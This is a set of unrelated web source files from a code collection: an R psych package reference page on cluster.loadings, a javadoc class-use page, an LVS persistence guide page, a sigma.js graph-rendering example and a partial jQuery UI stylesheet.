<title>Find item by cluster correlations, corrected for overlap and reliability — cluster.loadings • psych</title>
<!-- jquery -->
<script src="https://code.jquery.com/jquery-3.1.0.min.js" integrity="sha384-nrOSfDHtoPMzJHjVTdCopGqIqeYETSXhZDFyniQ8ZHcVy08QesyHcnOUpMpqnmWq" crossorigin="anonymous"></script>
<!-- Bootstrap -->
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<!-- Font Awesome icons -->
<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-T8Gy5hrqNKT+hzMclPo118YTQO6cYprQmhrYwIiQ/3axmI1hQomh7Ud2hPOy8SP1" crossorigin="anonymous">
<!-- pkgdown -->
<link href="../pkgdown.css" rel="stylesheet">
<script src="../jquery.sticky-kit.min.js"></script>
<script src="../pkgdown.js"></script>
<!-- mathjax -->
<script src='https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML'></script>
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container template-reference-topic">
<header>
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="../index.html">psych</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li>
<a href="../reference/index.html">Reference</a>
</li>
</ul>
<ul class="nav navbar-nav navbar-right">
</ul>
</div><!--/.nav-collapse -->
</div><!--/.container -->
</div><!--/.navbar -->
</header>
<div class="row">
<div class="col-md-9 contents">
<div class="page-header">
<h1>Find item by cluster correlations, corrected for overlap and reliability</h1>
</div>
<p>Given a n x n correlation matrix and a n x c matrix of -1,0,1 cluster weights for those n items on c clusters, find the correlation of each item with each cluster. If the item is part of the cluster, correct for item overlap. Part of the <code><a href='ICLUST.html'>ICLUST</a></code> set of functions, but useful for many item analysis problems.</p>
<pre class="usage"><span class='fu'>cluster.loadings</span>(<span class='no'>keys</span>, <span class='no'>r.mat</span>, <span class='kw'>correct</span> <span class='kw'>=</span> <span class='fl'>TRUE</span>,<span class='kw'>SMC</span><span class='kw'>=</span><span class='fl'>TRUE</span>)</pre>
<h2 class="hasAnchor" id="arguments"><a class="anchor" href="#arguments"></a> Arguments</h2>
<table class="ref-arguments">
<colgroup><col class="name" /><col class="desc" /></colgroup>
<tr>
<th>keys</th>
<td><p>Cluster keys: a matrix of -1,0,1 cluster weights</p></td>
</tr>
<tr>
<th>r.mat</th>
<td><p>A correlation matrix</p></td>
</tr>
<tr>
<th>correct</th>
<td><p>Correct for reliability</p></td>
</tr>
<tr>
<th>SMC</th>
<td><p>Use the squared multiple correlation as a communality estimate, otherwise use the greatest correlation for each variable</p></td>
</tr>
</table>
<h2 class="hasAnchor" id="details"><a class="anchor" href="#details"></a>Details</h2>
<p>Given a set of items to be scored as (perhaps overlapping) clusters and the intercorrelation matrix of the items, find the clusters and then the correlations of each item with each cluster. Correct for item overlap by replacing the item variance with its average within cluster inter-item correlation.</p>
<p>Although part of ICLUST, this may be used in any SAPA (<a href = 'http://sapa-project.org'>http://sapa-project.org</a>) application where we are interested in item- whole correlations of items and composite scales.</p>
<p>These loadings are particularly interpretable when sorted by absolute magnitude for each cluster (see <code><a href='ICLUST.sort.html'>ICLUST.sort</a></code>).</p>
<h2 class="hasAnchor" id="value"><a class="anchor" href="#value"></a>Value</h2>
<p></p>
<dt>loadings </dt><dd><p>A matrix of item-cluster correlations (loadings)</p></dd>
<dt>cor </dt><dd><p>Correlation matrix of the clusters</p></dd>
<dt>corrected </dt><dd><p>Correlation matrix of the clusters, raw correlations below the diagonal, alpha on diagonal, corrected for reliability above the diagonal</p></dd>
<dt>sd </dt><dd><p>Cluster standard deviations</p></dd>
<dt>alpha </dt><dd><p>alpha reliabilities of the clusters</p></dd>
<dt>G6</dt><dd><p>G6* Modified estimated of Guttman Lambda 6</p></dd>
<dt>count</dt><dd><p>Number of items in the cluster</p></dd>
<h2 class="hasAnchor" id="references"><a class="anchor" href="#references"></a>References</h2>
<p>ICLUST: <a href = 'http://personality-project.org/r/r.ICLUST.html'>http://personality-project.org/r/r.ICLUST.html</a></p>
<h2 class="hasAnchor" id="note"><a class="anchor" href="#note"></a>Note</h2>
<p>Although part of ICLUST, this may be used in any SAPA application where we are interested in item- whole correlations of items and composite scales.</p>
<h2 class="hasAnchor" id="see-also"><a class="anchor" href="#see-also"></a>See also</h2>
<p><code><a href='ICLUST.html'>ICLUST</a></code>, <code><a href='factor2cluster.html'>factor2cluster</a></code>, <code><a href='cluster.cor.html'>cluster.cor</a></code></p>
<h2 class="hasAnchor" id="examples"><a class="anchor" href="#examples"></a>Examples</h2>
<pre class="examples"><div class='input'>
<span class='no'>r.mat</span><span class='kw'><-</span> <span class='no'>Harman74.cor</span>$<span class='no'>cov</span>
<span class='no'>clusters</span> <span class='kw'><-</span> <span class='fu'>matrix</span>(<span class='fu'>c</span>(<span class='fl'>1</span>,<span class='fl'>1</span>,<span class='fl'>1</span>,<span class='fu'>rep</span>(<span class='fl'>0</span>,<span class='fl'>24</span>),<span class='fl'>1</span>,<span class='fl'>1</span>,<span class='fl'>1</span>,<span class='fl'>1</span>,<span class='fu'>rep</span>(<span class='fl'>0</span>,<span class='fl'>17</span>)),<span class='kw'>ncol</span><span class='kw'>=</span><span class='fl'>2</span>)
<span class='fu'>cluster.loadings</span>(<span class='no'>clusters</span>,<span class='no'>r.mat</span>)</div><div class='output co'>#> Call: cluster.loadings(keys = clusters, r.mat = r.mat)
#>
#> (Standardized) Alpha:
#> [1] 0.61 0.79
#>
#> (Standardized) G6*:
#> [1] 0.66 0.84
#>
#> Average item correlation:
#> [1] 0.35 0.48
#>
#> Number of items:
#> [1] 3 4
#>
#> Scale intercorrelations corrected for attenuation
#> raw correlations below the diagonal, alpha on the diagonal
#> corrected correlations above the diagonal:
#> [,1] [,2]
#> [1,] 0.61 0.69
#> [2,] 0.48 0.79
#>
#> Item by scale intercorrelations
#> corrected for item overlap and scale reliability
#> [,1] [,2]
#> VisualPerception 0.675 0.50
#> Cubes 0.512 0.32
#> PaperFormBoard 0.636 0.36
#> Flags 0.550 0.45
#> GeneralInformation 0.468 0.76
#> PargraphComprehension 0.459 0.82
#> SentenceCompletion 0.375 0.84
#> WordClassification 0.478 0.74
#> WordMeaning 0.387 0.85
#> Addition 0.054 0.30
#> Code 0.301 0.36
#> CountingDots 0.328 0.23
#> StraightCurvedCapitals 0.575 0.46
#> WordRecognition 0.222 0.30
#> NumberRecognition 0.238 0.27
#> FigureRecognition 0.520 0.34
#> ObjectNumber 0.196 0.31
#> NumberFigure 0.457 0.29
#> FigureWord 0.380 0.28
#> Deduction 0.523 0.57
#> NumericalPuzzles 0.461 0.43
#> ProblemReasoning 0.491 0.56
#> SeriesCompletion 0.661 0.56
#> ArithmeticProblems 0.382 0.54</div><div class='input'>
</div></pre>
</div>
<div class="col-md-3 hidden-xs hidden-sm" id="sidebar">
<h2>Contents</h2>
<ul class="nav nav-pills nav-stacked">
<li><a href="#arguments">Arguments</a></li>
<li><a href="#details">Details</a></li>
<li><a href="#value">Value</a></li>
<li><a href="#references">References</a></li>
<li><a href="#note">Note</a></li>
<li><a href="#see-also">See also</a></li>
<li><a href="#examples">Examples</a></li>
</ul>
<h2>Author</h2>
Maintainer: William Revelle <a href='mailto:revelle@northwestern.edu'>revelle@northwestern.edu</a>
</div>
</div>
<footer>
<div class="copyright">
<p>Developed by William Revelle.</p>
</div>
<div class="pkgdown">
<p>Site built with <a href="http://hadley.github.io/pkgdown/">pkgdown</a>.</p>
</div>
</footer>
</div>
</body>
</html>
|
doc/game/class-use/Entity.html | Aorewen/Angry-Bird-N3 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (1.8.0_25) on Fri Jan 15 15:35:26 CET 2016 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class game.Entity</title>
<meta name="date" content="2016-01-15">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class game.Entity";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../game/Entity.html" title="class in game">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?game/class-use/Entity.html" target="_top">Frames</a></li>
<li><a href="Entity.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class game.Entity" class="title">Uses of Class<br>game.Entity</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../game/Entity.html" title="class in game">Entity</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#game">game</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="game">
<!-- -->
</a>
<h3>Uses of <a href="../../game/Entity.html" title="class in game">Entity</a> in <a href="../../game/package-summary.html">game</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subclasses, and an explanation">
<caption><span>Subclasses of <a href="../../game/Entity.html" title="class in game">Entity</a> in <a href="../../game/package-summary.html">game</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Class and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../game/Bird.html" title="class in game">Bird</a></span></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../game/CircularObstacle.html" title="class in game">CircularObstacle</a></span></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../game/Enemy.html" title="class in game">Enemy</a></span></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../game/SquareObstacle.html" title="class in game">SquareObstacle</a></span></code> </td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../game/package-summary.html">game</a> with parameters of type <a href="../../game/Entity.html" title="class in game">Entity</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><span class="typeNameLabel">Entity.</span><code><span class="memberNameLink"><a href="../../game/Entity.html#collision-game.Entity-">collision</a></span>(<a href="../../game/Entity.html" title="class in game">Entity</a> e)</code>
<div class="block">Fonction qui renvoie true si l'entité rentre en contacte avec un autre.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">Entity.</span><code><span class="memberNameLink"><a href="../../game/Entity.html#elasticCollision-game.Entity-">elasticCollision</a></span>(<a href="../../game/Entity.html" title="class in game">Entity</a> e)</code>
<div class="block">Calcule de la vitesse après un choc entre deux entités.</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../game/Entity.html" title="class in game">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?game/class-use/Entity.html" target="_top">Frames</a></li>
<li><a href="Entity.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
docs/Piranha Docs/piranha-guide/x4086.html | keithbarrett/linux-piranha | <HTML
><HEAD
><TITLE
> Persistence
</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.54"><LINK
REL="HOME"
TITLE="piranha"
HREF="index.html"><LINK
REL="UP"
TITLE=" Linux Virtual Server (LVS)
"
HREF="ch-lvs.html"><LINK
REL="PREVIOUS"
TITLE=" Routing Prerequisites
"
HREF="x3991.html"><LINK
REL="NEXT"
TITLE=" Cluster Node Interconnection Prerequisites
"
HREF="x4097.html"></HEAD
><BODY
CLASS="SECT1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
>piranha </TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x3991.html"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
> Linux Virtual Server (LVS)</TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x4097.html"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"></DIV
><DIV
CLASS="SECT1"
><H1
CLASS="SECT1"
><A
NAME="AEN4086"
>Persistence</A
></H1
><P
> In certain situations, it may be desirable (for a time) for a client to
reconnect repeatedly to the same real server, rather than have an LVS
load balancing algorithm send that request to the best available server
at that momement. Examples of such situations include multi-screen web
forms, cookies, SSL, etc. In these cases, a client may not work properly
unless the transactions are being handled by the same server in order to
retain context. LVS provides a feature to handle this called
<I
CLASS="FIRSTTERM"
>persistence</I
>.
</P
><P
> When enabled, persistence acts like a timer. When a client connects to a
service, LVS remembers that last connection for a specified period of
time. If that same client IP address connects again within that period,
it will be sent to the same server that it used previously —
bypassing the load balancing mechanisms. When a connecton occurs outside
the time window, it is handled according to the scheduling rules in
place.
</P
><P
> Persistence also allows you to specify a subnet mask to apply to the
client IP address test as a tool for controlling what addresses qualify.
</P
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"><TABLE
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x3991.html"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="index.html"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x4097.html"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Routing Prerequisites</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="ch-lvs.html"
>Up</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Cluster Node Interconnection Prerequisites</TD
></TR
></TABLE
></DIV
></BODY
></HTML
> |
Client/Templates/Error.html | ptzeka/MathGame | <div class="PaneInner">
<div class="formRow">
<div class="formRow"><span class="EM">{{Title}}</span></div>
<div class="formRow"><span>{{Error}}</span></div>
</div>
<div class="formRow">
<span class="button" onclick="location.reload();">Reload</span>
</div>
</div>
|
examples/plugin-customShapes.html | hjort/sigma | <!-- START SIGMA IMPORTS -->
<script src="../js/sigma.min.js"></script>
<!-- END SIGMA IMPORTS -->
<script src="../js/plugins/sigma.renderers.customShapes.min.js"></script>
<div id="container">
<style>
#graph-container {
top: 0;
bottom: 0;
left: 0;
right: 0;
position: absolute;
}
</style>
<div id="graph-container"></div>
</div>
<script>
/**
* IMPORTANT: This only works with the canvas renderer. TBD in the future
* will also support the WebGL renderer.
*/
sigma.utils.pkg('sigma.canvas.nodes');
// generate a random graph
var i,
s,
img,
N = 100,
E = 500,
g = {
nodes: [],
edges: []
},
urls = [
'img/img1.png',
'img/img2.png',
'img/img3.png',
'img/img4.png'
],
colors = [
'#617db4',
'#668f3c',
'#c6583e',
'#b956af'
];
// Generate a random graph, going through the different shapes
for (i = 0; i < N; i++) {
var node = {
id: 'n' + i,
label: 'Node ' + i,
// note the ShapeLibrary.enumerate() returns the names of all
// supported renderers
type: ShapeLibrary.enumerate().map(function(s){return s.name;})[Math.round(Math.random()*5)],
x: Math.random(),
y: Math.random(),
size: Math.random(),
color: colors[Math.floor(Math.random() * colors.length)],
borderColor: colors[Math.floor(Math.random()* colors.length)]
};
if(Math.random()>0.75 && node.type!='pacman') { // ~0.75 of the (non-pacman)shapes will have an image
node.image = {
url: urls[Math.floor(Math.random() * urls.length)],
// scale/clip are ratio values applied on top of 'size'
scale: 1.3,
clip: 0.85
}
}
switch(node.type) {
case "equilateral":
node.equilateral = {
rotate: Math.random()*45, // random rotate up to 45 deg
numPoints: Math.round(5 + Math.random()*3)
}
break;
case "star":
node.star = {
innerRatio: 0.4 + Math.random()*0.2,
numPoints: Math.round(4 + Math.random()*3)
}
if(node.image) {
// note clip/scale are ratio values. So we fit them to the inner ratio of the star shape
node.image.clip = node.star.innerRatio *0.95;
node.image.scale = node.star.innerRatio *1.2;
}
break;
case "square":
case "diamond":
if(node.image) {
// note clip/scale are ratio values. So we fit them to the borders of the square shape
node.image.clip = 0.7;
}
break;
case "circle":
break;
case "cross":
node.cross = {
lineWeight: Math.round(Math.random() * 5)
}
break;
}
g.nodes.push(node);
}
for (i = 0; i < E; i++)
g.edges.push({
id: 'e' + i,
source: 'n' + (Math.random() * N | 0),
target: 'n' + (Math.random() * N | 0),
size: Math.random()
});
s = new sigma({
graph: g,
renderer: {
// IMPORTANT:
// This works only with the canvas renderer, so the
// renderer type set as "canvas" is necessary here.
container: document.getElementById('graph-container'),
type: 'canvas'
},
settings: {
minNodeSize: 8,
maxNodeSize: 16,
}
});
CustomShapes.init(s);
s.refresh();
</script>
|
warmersun_lessonplans_site/lessonplan/static/lessonplan/jquery-ui-1.11.4.custom/jquery-ui.css | warmersun/lessonplan2 | /*! jQuery UI - v1.11.4 - 2015-08-18
* http://jqueryui.com
* Includes: core.css, slider.css, theme.css
* To view and modify this theme, visit http://jqueryui.com/themeroller/
* Copyright 2015 jQuery Foundation and other contributors; Licensed MIT */
/* Layout helpers
----------------------------------*/
.ui-helper-hidden {
display: none;
}
.ui-helper-hidden-accessible {
border: 0;
clip: rect(0 0 0 0);
height: 1px;
margin: -1px;
overflow: hidden;
padding: 0;
position: absolute;
width: 1px;
}
.ui-helper-reset {
margin: 0;
padding: 0;
border: 0;
outline: 0;
line-height: 1.3;
text-decoration: none;
font-size: 100%;
list-style: none;
}
.ui-helper-clearfix:before,
.ui-helper-clearfix:after {
content: "";
display: table;
border-collapse: collapse;
}
.ui-helper-clearfix:after {
clear: both;
}
.ui-helper-clearfix {
min-height: 0; /* support: IE7 */
}
.ui-helper-zfix {
width: 100%;
height: 100%;
top: 0;
left: 0;
position: absolute;
opacity: 0;
filter:Alpha(Opacity=0); /* support: IE8 */
}
.ui-front {
z-index: 100;
}
/* Interaction Cues
----------------------------------*/
.ui-state-disabled {
cursor: default !important;
}
/* Icons
----------------------------------*/
/* states and images */
.ui-icon {
display: block;
text-indent: -99999px;
overflow: hidden;
background-repeat: no-repeat;
}
/* Misc visuals
----------------------------------*/
/* Overlays */
.ui-widget-overlay {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
.ui-slider {
position: relative;
text-align: left;
}
.ui-slider .ui-slider-handle {
position: absolute;
z-index: 2;
width: 1.2em;
height: 1.2em;
cursor: default;
-ms-touch-action: none;
touch-action: none;
}
.ui-slider .ui-slider-range {
position: absolute;
z-index: 1;
font-size: .7em;
display: block;
border: 0;
background-position: 0 0;
}
/* support: IE8 - See #6727 */
.ui-slider.ui-state-disabled .ui-slider-handle,
.ui-slider.ui-state-disabled .ui-slider-range {
filter: inherit;
}
.ui-slider-horizontal {
height: .8em;
}
.ui-slider-horizontal .ui-slider-handle {
top: -.3em;
margin-left: -.6em;
}
.ui-slider-horizontal .ui-slider-range {
top: 0;
height: 100%;
}
.ui-slider-horizontal .ui-slider-range-min {
left: 0;
}
.ui-slider-horizontal .ui-slider-range-max {
right: 0;
}
.ui-slider-vertical {
width: .8em;
height: 100px;
}
.ui-slider-vertical .ui-slider-handle {
left: -.3em;
margin-left: 0;
margin-bottom: -.6em;
}
.ui-slider-vertical .ui-slider-range {
left: 0;
width: 100%;
}
.ui-slider-vertical .ui-slider-range-min {
bottom: 0;
}
.ui-slider-vertical .ui-slider-range-max {
top: 0;
}
/* Component containers
----------------------------------*/
.ui-widget {
font-family: Verdana,Arial,sans-serif;
font-size: 1.1em;
}
.ui-widget .ui-widget {
font-size: 1em;
}
.ui-widget input,
.ui-widget select,
.ui-widget textarea,
.ui-widget button {
font-family: Verdana,Arial,sans-serif;
font-size: 1em;
}
.ui-widget-content {
border: 1px solid #aaaaaa;
background: #ffffff url("images/ui-bg_flat_75_ffffff_40x100.png") 50% 50% repeat-x;
color: #222222;
}
.ui-widget-content a {
color: #222222;
}
.ui-widget-header {
border: 1px solid #aaaaaa;
background: #cccccc url("images/ui-bg_highlight-soft_75_cccccc_1x100.png") 50% 50% repeat-x;
color: #222222;
font-weight: bold;
}
.ui-widget-header a {
color: #222222;
}
/* Interaction states
----------------------------------*/
.ui-state-default,
.ui-widget-content .ui-state-default,
.ui-widget-header .ui-state-default {
border: 1px solid #d3d3d3;
background: #e6e6e6 url("images/ui-bg_glass_75_e6e6e6_1x400.png") 50% 50% repeat-x;
font-weight: normal;
color: #555555;
}
.ui-state-default a,
.ui-state-default a:link,
.ui-state-default a:visited {
color: #555555;
text-decoration: none;
}
.ui-state-hover,
.ui-widget-content .ui-state-hover,
.ui-widget-header .ui-state-hover,
.ui-state-focus,
.ui-widget-content .ui-state-focus,
.ui-widget-header .ui-state-focus {
border: 1px solid #999999;
background: #dadada url("images/ui-bg_glass_75_dadada_1x400.png") 50% 50% repeat-x;
font-weight: normal;
color: #212121;
}
.ui-state-hover a,
.ui-state-hover a:hover,
.ui-state-hover a:link,
.ui-state-hover a:visited,
.ui-state-focus a,
.ui-state-focus a:hover,
.ui-state-focus a:link,
.ui-state-focus a:visited {
color: #212121;
text-decoration: none;
}
.ui-state-active,
.ui-widget-content .ui-state-active,
.ui-widget-header .ui-state-active {
border: 1px solid #aaaaaa;
background: #ffffff url("images/ui-bg_glass_65_ffffff_1x400.png") 50% 50% repeat-x;
font-weight: normal;
color: #212121;
}
.ui-state-active a,
.ui-state-active a:link,
.ui-state-active a:visited {
color: #212121;
text-decoration: none;
}
/* Interaction Cues
----------------------------------*/
.ui-state-highlight,
.ui-widget-content .ui-state-highlight,
.ui-widget-header .ui-state-highlight {
border: 1px solid #fcefa1;
background: #fbf9ee url("images/ui-bg_glass_55_fbf9ee_1x400.png") 50% 50% repeat-x;
color: #363636;
}
.ui-state-highlight a,
.ui-widget-content .ui-state-highlight a,
.ui-widget-header .ui-state-highlight a {
color: #363636;
}
.ui-state-error,
.ui-widget-content .ui-state-error,
.ui-widget-header .ui-state-error {
border: 1px solid #cd0a0a;
background: #fef1ec url("images/ui-bg_glass_95_fef1ec_1x400.png") 50% 50% repeat-x;
color: #cd0a0a;
}
.ui-state-error a,
.ui-widget-content .ui-state-error a,
.ui-widget-header .ui-state-error a {
color: #cd0a0a;
}
.ui-state-error-text,
.ui-widget-content .ui-state-error-text,
.ui-widget-header .ui-state-error-text {
color: #cd0a0a;
}
.ui-priority-primary,
.ui-widget-content .ui-priority-primary,
.ui-widget-header .ui-priority-primary {
font-weight: bold;
}
.ui-priority-secondary,
.ui-widget-content .ui-priority-secondary,
.ui-widget-header .ui-priority-secondary {
opacity: .7;
filter:Alpha(Opacity=70); /* support: IE8 */
font-weight: normal;
}
.ui-state-disabled,
.ui-widget-content .ui-state-disabled,
.ui-widget-header .ui-state-disabled {
opacity: .35;
filter:Alpha(Opacity=35); /* support: IE8 */
background-image: none;
}
.ui-state-disabled .ui-icon {
filter:Alpha(Opacity=35); /* support: IE8 - See #6059 */
}
/* Icons
----------------------------------*/
/* states and images */
.ui-icon {
width: 16px;
height: 16px;
}
.ui-icon,
.ui-widget-content .ui-icon {
background-image: url("images/ui-icons_222222_256x240.png");
}
.ui-widget-header .ui-icon {
background-image: url("images/ui-icons_222222_256x240.png");
}
.ui-state-default .ui-icon {
background-image: url("images/ui-icons_888888_256x240.png");
}
.ui-state-hover .ui-icon,
.ui-state-focus .ui-icon {
background-image: url("images/ui-icons_454545_256x240.png");
}
.ui-state-active .ui-icon {
background-image: url("images/ui-icons_454545_256x240.png");
}
.ui-state-highlight .ui-icon {
background-image: url("images/ui-icons_2e83ff_256x240.png");
}
.ui-state-error .ui-icon,
.ui-state-error-text .ui-icon {
background-image: url("images/ui-icons_cd0a0a_256x240.png");
}
/* positioning */
.ui-icon-blank { background-position: 16px 16px; }
.ui-icon-carat-1-n { background-position: 0 0; }
.ui-icon-carat-1-ne { background-position: -16px 0; }
.ui-icon-carat-1-e { background-position: -32px 0; }
.ui-icon-carat-1-se { background-position: -48px 0; }
.ui-icon-carat-1-s { background-position: -64px 0; }
.ui-icon-carat-1-sw { background-position: -80px 0; }
.ui-icon-carat-1-w { background-position: -96px 0; }
.ui-icon-carat-1-nw { background-position: -112px 0; }
.ui-icon-carat-2-n-s { background-position: -128px 0; }
.ui-icon-carat-2-e-w { background-position: -144px 0; }
.ui-icon-triangle-1-n { background-position: 0 -16px; }
.ui-icon-triangle-1-ne { background-position: -16px -16px; }
.ui-icon-triangle-1-e { background-position: -32px -16px; }
.ui-icon-triangle-1-se { background-position: -48px -16px; }
.ui-icon-triangle-1-s { background-position: -64px -16px; }
.ui-icon-triangle-1-sw { background-position: -80px -16px; }
.ui-icon-triangle-1-w { background-position: -96px -16px; }
.ui-icon-triangle-1-nw { background-position: -112px -16px; }
.ui-icon-triangle-2-n-s { background-position: -128px -16px; }
.ui-icon-triangle-2-e-w { background-position: -144px -16px; }
.ui-icon-arrow-1-n { background-position: 0 -32px; }
.ui-icon-arrow-1-ne { background-position: -16px -32px; }
.ui-icon-arrow-1-e { background-position: -32px -32px; }
.ui-icon-arrow-1-se { background-position: -48px -32px; }
.ui-icon-arrow-1-s { background-position: -64px -32px; }
.ui-icon-arrow-1-sw { background-position: -80px -32px; }
.ui-icon-arrow-1-w { background-position: -96px -32px; }
.ui-icon-arrow-1-nw { background-position: -112px -32px; }
.ui-icon-arrow-2-n-s { background-position: -128px -32px; }
